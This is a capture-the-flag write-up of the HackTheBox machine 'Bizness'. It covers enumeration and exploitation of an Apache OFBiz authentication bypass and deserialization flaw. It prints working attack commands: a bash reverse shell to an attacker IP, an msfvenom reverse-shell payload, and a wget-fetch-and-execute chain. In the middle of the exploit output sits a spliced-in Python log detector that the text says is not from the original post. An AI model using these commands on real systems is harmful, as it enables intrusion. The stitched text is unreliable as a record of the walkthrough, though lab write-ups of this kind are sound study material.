All Computers Are Broken



Bizness

Posted on [2024-02-03 Sat]

nmap

$ nmap -sV -sC -p- -Pn 10.10.11.252 -oA bizness
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 12:10 CET
Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.045s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp   open  ssl/http   nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
|_http-trane-info: Problem with XML parsing of /evox/about
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
| tls-nextprotoneg:
|_  http/1.1
|_http-server-header: nginx/1.18.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
39415/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.76 second

The initial nmap scan reveals the domain name of the system. I add a corresponding entry to /etc/hosts and continue with the enumeration.

Initial enumeration

$ ffuf -u https://bizness.htb/FUZZ -ic -r -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 27200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://bizness.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 27200
________________________________________________

content                 [Status: 200, Size: 11178, Words: 1222, Lines: 187, Duration: 1028ms]
catalog                 [Status: 200, Size: 11331, Words: 1239, Lines: 188, Duration: 1693ms]
marketing               [Status: 200, Size: 11098, Words: 1211, Lines: 186, Duration: 1612ms]
ar                      [Status: 200, Size: 11078, Words: 1211, Lines: 186, Duration: 1363ms]
ap                      [Status: 200, Size: 11078, Words: 1211, Lines: 186, Duration: 3239ms]
ecommerce               [Status: 200, Size: 530, Words: 55, Lines: 9, Duration: 3923ms]
ebay                    [Status: 200, Size: 11054, Words: 1209, Lines: 186, Duration: 955ms]
control                 [Status: 200, Size: 34633, Words: 10468, Lines: 492, Duration: 649ms]
manufacturing           [Status: 200, Size: 11150, Words: 1211, Lines: 186, Duration: 1156ms]
example                 [Status: 200, Size: 11154, Words: 1220, Lines: 188, Duration: 1130ms]
bi                      [Status: 200, Size: 11059, Words: 1211, Lines: 186, Duration: 2325ms]
accounting              [Status: 200, Size: 11104, Words: 1211, Lines: 186, Duration: 635ms]
webtools                [Status: 200, Size: 9852, Words: 1003, Lines: 154, Duration: 1092ms]
facility                [Status: 200, Size: 11108, Words: 1211, Lines: 186, Duration: 1272ms]
myportal                [Status: 200, Size: 10725, Words: 1193, Lines: 180, Duration: 2676ms]
sfa                     [Status: 200, Size: 11263, Words: 1236, Lines: 188, Duration: 1812ms]
:: Progress: [220547/220547] :: Job [1/1] :: 314 req/sec :: Duration: [0:14:05] :: Errors: 0 ::

The ecommerce directory stands out because its response size is much smaller than that of the other directories.

When the ecommerce directory is accessed, it redirects to https://bizness.htb/ecommerce/control/main. I instruct curl to follow the redirect with the -L parameter.

$ curl -kL https://bizness.htb/ecommerce/
<!DOCTYPE html>
<!-- Begin Screen component://ecommerce/widget/CommonScreens.xml#main -->
<!-- Begin Screen component://ecommerce/widget/CommonScreens.xml#main-decorator -->
<!-- Begin Section Widget  -->
<span>A Product Store has not been defined for this ecommerce site.  A Product Store can be created using the ofbizsetup wizard.</span>
<!-- End Section Widget  -->
<!-- End Screen component://ecommerce/widget/CommonScreens.xml#main-decorator -->
<!-- End Screen component://ecommerce/widget/CommonScreens.xml#main -->

The interesting string here is ofbizsetup. A quick search reveals that this is likely Apache OFBiz, an enterprise resource planning tool written in Java. There is already a public exploit for a recent vulnerability in the software. There is an explanation of the vulnerability here and exploit code here.

According to the exploit code, I can check if the system is vulnerable via a request to https://bizness.htb/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y. If it returns PONG, the system is vulnerable.

$ curl -kL 'https://bizness.htb/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y'


PONG

This indicates that the system is vulnerable. After reviewing the exploit code, I am comfortable running it. Initially, I was not able to get a reverse shell via

$ python3 exploit.py --url https://bizness.htb --cmd '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.6/443 0>&1"'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
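As an added example (not from the original post or the exploit's author), a small detector that scans web-server access-log lines for the pattern behind the PONG check above: a request to an OFBiz /control/ endpoint whose query string carries requirePasswordChange=Y together with blank USERNAME and PASSWORD. The log lines are constructed, and the combined log format and the choice to treat absent credentials like blank ones are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed nginx/Apache "combined" log format: client, timestamp,
# request line, status. Only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

def is_ofbiz_bypass_request(target: str) -> bool:
    """True if the request target matches the indicator from the post:
    an OFBiz /control/ URL with requirePasswordChange=Y and blank
    USERNAME/PASSWORD (the unauthenticated ping check shown above)."""
    parts = urlsplit(target)
    if "/control/" not in parts.path:
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("requirePasswordChange", [""])[0] != "Y":
        return False
    # Blank credentials are the tell; a genuine password-change request
    # carries a username. Absent parameters are treated as blank (assumption).
    user = qs.get("USERNAME", [""])[0]
    pw = qs.get("PASSWORD", [""])[0]
    return user == "" and pw == ""

def scan_access_log(lines):
    """Return (ip, timestamp, target, status) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_ofbiz_bypass_request(m["target"]):
            hits.append((m["ip"], m["ts"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines, not taken from any real system.
SAMPLE_LOG = [
    '10.10.14.6 - - [13/Jan/2024:12:30:01 +0100] "GET /webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 4 "-" "curl/8.5.0"',
    '192.0.2.7 - - [13/Jan/2024:12:31:00 +0100] "GET /ecommerce/control/main HTTP/1.1" 200 530 "-" "Mozilla/5.0"',
    '192.0.2.8 - - [13/Jan/2024:12:32:00 +0100] "POST /webtools/control/ping?USERNAME=admin&PASSWORD=x&requirePasswordChange=Y HTTP/1.1" 200 4 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Jan/2024:12:33:00 +0100] "POST /webtools/control/ping?requirePasswordChange=Y HTTP/1.1" 200 4 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious OFBiz request:", hit)
```

A 200 on such a request is the same signal the PONG check gives the attacker, so the status field is worth alerting on alongside the URL pattern.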

To test if command execution works, I first set up a tcpdump listener to look for incoming ICMP packets.

$ sudo tcpdump -i tun0 'icmp'
[sudo] password for grumpa:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

I test for command execution via a simple ping command.

$ python3 exploit.py --url https://bizness.htb --cmd 'ping -c 1 10.10.14.6'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.

After executing the ping payload, I receive a response in tcpdump. This means that the command execution generally works.

$ sudo tcpdump -i tun0 'icmp'
[sudo] password for grumpa:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
13:42:24.210739 IP bizness.htb > boron: ICMP echo request, id 54421, seq 1, length 64
13:42:24.210774 IP boron > bizness.htb: ICMP echo reply, id 54421, seq 1, length 64
^C
2 packets captured
2 packets received by filter
0 packets dropped by kernel

To get a reverse shell, I first created a reverse shell binary with msfvenom.

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=$(myip) LPORT=443 -f elf > foo
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

This must be served via HTTP so that it can be downloaded in the next step.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Now I can use the remote code execution vulnerability to download the reverse shell, make it executable, and finally execute it.

$ python3 exploit.py --url https://bizness.htb --cmd 'wget http://10.10.14.6/foo -O /tmp/foo'
$ python3 exploit.py --url https://bizness.htb --cmd 'chmod +x /tmp/foo'
$ rlwrap -cAr nc -lvnp 443
$ python3 exploit.py --url https://bizness.htb --cmd '/tmp/foo'

I have an interactive session on the system now and can read the user flag.

$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.252] 60744
id
uid=1001(ofbiz) gid=1001(ofbiz-operator) groups=1001(ofbiz-operator)
cat /home/ofbiz/user.txt
be5dd46b2cf8dc5a86dfe653188445d4

Local enumeration
